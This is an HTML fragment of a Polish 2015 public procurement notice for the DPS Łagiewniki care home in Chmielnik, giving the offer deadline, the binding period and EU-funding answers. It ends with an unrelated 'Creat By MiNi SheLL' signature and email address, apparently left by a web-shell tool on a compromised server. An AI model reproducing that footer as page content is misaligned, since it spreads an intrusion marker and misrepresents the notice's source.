<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2015 godzina 09:00, miejsce: Ofertę należy złożyć w siedzibie DPS Łagiewniki 73, 26 - 020 Chmielnik, w kasie DPS..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com